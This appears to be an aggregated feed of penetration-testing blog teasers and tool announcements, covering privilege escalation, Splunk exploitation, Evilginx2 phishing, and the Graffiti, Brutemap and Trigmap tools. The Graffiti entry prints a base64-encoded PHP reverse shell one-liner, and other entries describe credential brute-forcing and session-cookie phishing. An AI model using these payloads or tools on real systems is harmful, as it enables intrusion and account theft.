Linux for Pentester: Wget Privilege Escalation

In this article, we are going to describe the entire utility of Wget command and how vital it is in Linux penetration testing. As Wget is used for downloading the files from the server so here we will learn that what else we can do by this command in Privilege Escalation. Table of Content Introduction… Continue reading →
The post Linux for Pentester: Wget Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/

Penetration Testing on Splunk

In this article, we are going to exploit SPLUNK using the reverse shell. One can find this beneficial in exploiting and do penetration testing of SPLUNK environment of their respective IT infrastructure. Table of Content Introduction to SPLUNK Deploying SPLUNK on UBUNTU Exploiting SPLUNK using a reverse shell What is SPLUNK? Splunk Enterprise Security (ES)… Continue reading →
The post Penetration Testing on Splunk appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/penetration-testing-on-splunk/

Evilginx2- Advanced Phishing Attack Framework

This is the successor of Evilginx 1, and it stays in-line with the MITM lineage. This tool is designed for a Phishing attack to capture login credentials and a session cookie.  Table of Content Overview Setup Perquisites Installation Domain Setup Priming Evilginx Execution Lure Creation Attack Simulation Overview One of the biggest concerns in today’s… Continue reading →
The post Evilginx2- Advanced Phishing Attack Framework appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/evilginx2-advanced-phishing-attack-framework/

Linux for Pentester: APT Privilege Escalation

In this article, we’ll talk about APT (apt-get) functionality and learn how helpful the apt command is for Linux penetration testing and how we’ll progress apt to scale the greater privilege shell. Table of Content Introduction to APT (apt-get) Major Operation performed using APT (apt-get) Exploiting APT (apt-get) Sudo Rights Lab setups for Privilege Escalation… Continue reading →
The post Linux for Pentester: APT Privilege Escalation appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation/

ANDRAX v3 – The First And Unique Penetration Testing Platform For Android Smartphones

ANDRAX The first and unique Penetration Testing platform for Android smartphones.Thanks to Jessica Helena she made ANDRAX v3 possible.What is ANDRAXANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful than a common distribution!Why is Android so powerful?Simple, everyone has a smartphone and spends all the time with it! We have the possibility to camouflage easily in the middle of everyone, the processor architecture of most Android smartphones is ARM a modern and robust architecture extremely superior to the rest, With touch screens we can run the tools with great agility and take advantage of the graphical interface of Android, we can get in almost anywhere with our smartphones…In technical terms, ANDRAX and NetHunter should never be compared, ANDRAX is a penetration testing platform for Android smartphones and NetHunter is just a Debian emulator running with chroot.Termux is not our enemy, Termux is an application that allows installation of many Linux packages using a Debian environment running natively on Android.ANDRAX and Termux have a similar development, ANDRAX and Termux share many libs and GNU/Linux resources.But Termux is not a penetration testing platform, it’s software to bring basic tools found in a Debian environment. Penetration tests are not something basic! But advanced techniques that involve advanced tools and a advanced environment to conduct good tests!So you can install many tools manually in Termux but it would be extremely difficult to optimize and configure them to take 100% of the required potential for penetration testing.Termux runs without root privileges and this makes it very difficult to use advanced tools. Features and ToolsTool listInformation GatheringWhoisBind DNS toolsDnsreconRaccoonDNS-CrackerFirewalkScanningNmap – Network MapperMasscanSSLScanAmapPacket CraftingHping3NpingScapyHexinjectNcatSocatNetwork HackingARPSpoofBettercapMITMProxyEvilGINX2WebSite Hacking0d1nWapiti3Recon-NGPHPSploitPhotonXSSerCommixSQLMapPayloadmaskAbernathY-XSSPassword HackingHydraNcrackJohn The RipperCRUNCHWireless HackingVMP Evil APAircrack-NG ToolsCowpattyMDK3ReaverExploitationMetaSploit FrameworkRouterSploit FrameworkGetsploitOWASP ZSCRop-TOOLMore…Advanced TerminalAdvanced and Professional terminal emulator for Hacking!Dynamic Categories Overlay (DCO)Beautiful tools category system Advanced IDEComplete support for many programming languagesInformation GatheringTools for initial informations about the targetScanningTools for second stage: ScanningPacket CraftingTools to craft network packetsNetwork HackingTools for network hackingWebSite HackingTools for WebSite and WebApps HackingPassword HackingTools to break passwordsWireless HackingTools for Wireless HackingExploitationTools for Dev and launch exploitsMore info in official site.Download ANDRAX

Link: http://feedproxy.google.com/~r/PentestTools/~3/3jIpU7zeiJg/andrax-v3-first-and-unique-penetration.html

UPDATE: Kali Linux 2019.2 Release

PenTestIT RSS Feed
Kali Linux 2019.2, the latest and the greatest Kali Linux release is now officially available! This is the second 2019 release, which comes after Kali Linux 2019.1, that was made available in the month of February. This new release majorly focuses on Kali Linux NetHunter updates including 13 new images and added device support along withRead more about UPDATE: Kali Linux 2019.2 Release
The post UPDATE: Kali Linux 2019.2 Release appeared first on PenTestIT.

Link: http://pentestit.com/update-kali-linux-2019-2-release/

Graffiti – A Tool To Generate Obfuscated One Liners To Aid In Penetration Testing

NOTE: Never upload payloads to online checkersGraffiti is a tool to generate obfuscated oneliners to aid in penetration testing situations. Graffiti accepts the following languages for encoding:PythonPerlBatchPowershellPHPBashGraffiti will also accept a language that is not currently on the list and store the oneliner into a database.FeaturesGraffiti comes complete with a database that will insert each encoded payload into it, in order to allow end users to view already created payloads for future use. The payloads can be encoded using the following techniques:XorBase64HexROT13RawSome features of Graffiti include:Terminal drop in access, with the ability to run external commandsAbility to create your own payload JSON filesAbility to view cached payloads inside of the databaseAbility to run the database in memory for quick deletionTerminal history and saving of terminal historyAuto tab completion inside of terminalAbility to securely wipe the history files and database fileMultiple encoding techniques as mentioned aboveUsageGraffiti comes with a builtin terminal, when you pass no flags to the program it will drop into the terminal. The terminal has history, the ability to run external commands, and it’s own internal commands. In order to get help, you jsut have to type help or ?: ________ _____ _____.__ __ .__ / _____/___________ _/ ____\/ ____\__|/ |_|__|/ \ __\_ __ \__ \\ __\\ __\| \ __\ |\ \_\ \ | \// __ \| | | | | || | | | \______ /__| (____ /__| |__| |__||__| |__| \/ \/ v(0.1) no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminalroot@graffiti:~/graffiti# ? Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadroot@graffiti:~/graffiti# help Command Description——— ————– help/? Show this help external List available external commands cached Display all payloads that are already in the database list/show List all available payloads search <phrase> Search for a specific payload use <payload> <coder> Use this payload and encode it using a specified coder info <payload> Get information on a specified payload check Check for updates history Display command history exit/quit Exit the terminal and running session encode <script-type> <coder> Encode a provided payloadGraffiti also comes with command line arguments for when you need a payload encoded quickly:usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD] [–create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS] [-l] [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]]] [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC] [-H] [-W] [–memory] [-mC COMMAND [COMMAND …]]optional arguments: -h, –help show this help message and exit -c CODEC, –codec CODEC specify an encoding technique (*default=None) -p PAYLOAD, –payload PAYLOAD pass the path to a payload to use (*default=None) –create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS create a payload file and store it inside of ./etc/payloads (*default=None) -l, –list list all available payloads by path (*default=False) -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]], –personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION …]] pass your own personal payload to use for the encoding (*default=None) -lH LISTENING-ADDRESS, –lhost LISTENING-ADDRESS pass a listening address to use for the payload (if needed) (*default=None) -lP LISTENING-PORT, –lport LISTENING-PORT pass a listening port to use for the payload (if needed) (*default=None) -u URL, –url URL pass a URL if needed by your payload (*default=None) -vC, –view-cached view the cached data already present inside of the database -H, –no-history do not store the command history (*default=True) -W, –wipe wipe the database and the history (*default=False) –memory initialize the database into memory instead of a .db file (*default=False) -mC COMMAND [COMMAND …], –more-commands COMMAND [COMMAND …] pass more external commands, this will allow them to be accessed inside of the terminal commands must be in your PATH (*default=None)Encoding a payload is simple as this:root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065Encoded Payload:————————————————–php -r ‘exec(base64_decode(“JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));’————————————————–A demo of Graffiti can be found here:InstallationOn any Linux, Mac, or Windows system, Graffiti should work out of the box without the need to install any external packages. If you would like to install Graffiti as an executable onto your system (you must be running either Linux or Mac for it to work successfully), all you have to do is the following:./install.shThis will install Graffiti into your system and allow you to run it from anywhere.Bugs and issuesIf you happen to find a bug or an issue, please create an issue with details here and thank you ahead of time!Download Graffiti

Link: http://feedproxy.google.com/~r/PentestTools/~3/4mCLQQpiWHw/graffiti-tool-to-generate-obfuscated.html

Brutemap – Tool That Automates Testing Accounts To The Site’s Login Page

Brutemap is an open source penetration testing tool that automates testing accounts to the site’s login page, based on Dictionary Attack. With this, you no longer need to search for other bruteforce tools and you also no longer need to ask CMS What is this? only to find parameter forms, because brutemap will do it automatically. Brutemap is also equipped with an attack method that makes it easy for you to do account checking or test forms with the SQL injection bypass authentication technique. InstallationBrutemap uses selenium to interact with the website. So, you need to install Web Driver for selenium first. See here. If you have installed the git package, you only need to clone the repository Git. Like this:$ git clone https://github.com/brutemap-dev/brutemap.gitAnd, install the required modules:$ pip install -r requirements.txt UsageFor basic use:$ python brutemap.py -t http://www.example.com/admin/login.php -u admin -p defaultTo display a list of available options:$ python brutemap.py -hYou can find examples of brutemap usage here. For more information about available options, you can visit the User’s manual.Video LinksHomepage: https://brutemap-dev.github.ioDownload: .zip (latest version) atau .tar.gz (latest version).Issue tracker: https://github.com/brutemap-dev/brutemap/issuesUser’s manual: https://github.com/brutemap-dev/brutemap/wikiDownload Brutemap

Link: http://feedproxy.google.com/~r/PentestTools/~3/HEi_Ynm05Wg/brutemap-tool-that-automates-testing.html

Trigmap – A Wrapper For Nmap To Automate The Pentest

Trigmap is a wrapper for Nmap. You can use it to easily start Nmap scan and especially to collect informations into a well organized directory hierarchy. The use of Nmap makes the script portable (easy to run not only on Kali Linux) and very efficient thanks to the optimized Nmap algorithms.DetailsTrigmap can performs several tasks using Nmap scripting engine (NSE):Port ScanService and Version DetectionWeb Resources EnumerationVulnerability AssessmentCommon Vulnerabilities TestCommon Exploits TestDictionary Attacks Against Active ServicesDefault Credentials TestUsageTrigmap can be used in two ways:Interactive mode:trigmap [ENTER], and the script does the restNON-interactive mode:trigmap -h|–host [-tp|–tcp TCP ports] [-up|–udp UDP ports] [-f|–file file path] [-s|–speed time profile] [-n|–nic NIC] [-p|–phase phases]If you want to see the help: trigmap –help to print this helperFor more screenshots see the relative directory of the repository.Dir HierarchyCustomizationIt’s possible to customize the script by changing the value of variables at the beginning of the file. In particularly you can choose the wordlists used by the Nmap scripts and the most important Nmap scan parameters (ping, scan, timing and script).################################################# PARAMETERS #################################################GENERAL_USER_LIST=’general_user_wordlist_short.txt’WIN_USER_LIST=’win_user_wordlist_short.txt’UNIX_USER_LIST=’unix_user_wordlist_short.txt’SHORT_PASS_LIST=’fasttrack.txt’LONG_PASS_LIST=’rockyou.txt’################################################# NMAP SETTING ################################################## PE (echo req), PP (timestamp-request)# you can add a port on every ping scanNMAP_PING=’-PE -PS80,443,22,25,110,445 -PU -PP -PA80,443,22,25,110,445’NMAP_OTHER=’-sV –allports -O –fuzzy –min-hostgroup 256’SCRIPT_VA='(auth or vuln or exploit or http-* and not dos)’SCRIPT_BRUTE='(auth or vuln or exploit or http-* or brute and not dos)’SCRIPT_ARGS=”userdb=$GENERAL_USER_LIST,passdb=$SHORT_PAS S_LIST"CUSTOM_SCAN=’–max-retries 3 –min-rate 250′ # LIKE UNICORNSCANTwin BrotherThis project is very similar to Kaboom, but it has a different philosophy; infact, it uses only Nmap, while Kaboom uses different tools, one for each task. The peculiarity of Trigmap is the portability and the efficient, but it’s recommended to use both the tools to scan the targets in a such way to gather more evidence with different tools (redundancy and reliability).Download Trigmap

Link: http://feedproxy.google.com/~r/PentestTools/~3/4v03LmjMcd4/trigmap-wrapper-for-nmap-to-automate.html

Horn3t – Powerful Visual Subdomain Enumeration At The Click Of A Mouse

Horn3t is your Nr #1 tool for exploring subdomains visually.Building on the great Sublist3r framework (or extensible with your favorite one) it searches for subdomains and generates awesome picture previews. Get a fast overview of your target with http status codes, add custom found subdomains and directly access found urls with one click.Recon your targets at blazing speedEnhance your productivity by focusing on interesting looking sitesEnumerate critical sites immediatelySting your targetInstallationInstall Google ChromeInstall requirements.txt with pip3Install requirements.txt of sublist3r with pip3Put the directory within the web server of your choiceMake sure to have the right permissionsRun horn3t.pyOr alternatively use the install.sh file with docker.Afterwards you can access the web portal under http://localhost:1337TodoBetter Scaling on FirefoxAdd Windows DockerfileDirekt Nmap Support per click on a subdomainDirekt Dirb Support per click on a subdomainGenerate PDF Reports of found subdomainsAssist with subdomain takeoverCreditsaboul3la – The creator of Sublist3r; turbolist3r adds some features but is otherwise a near clone of sublist3r.TheRook – The bruteforce module was based on his script subbrute.bitquark – The Subbrute’s wordlist was based on his research dnspop.Tested on Windows 10 and Debian with Google Chrome/Chromium 73Download Horn3t

Link: http://www.kitploit.com/2019/05/horn3t-powerful-visual-subdomain.html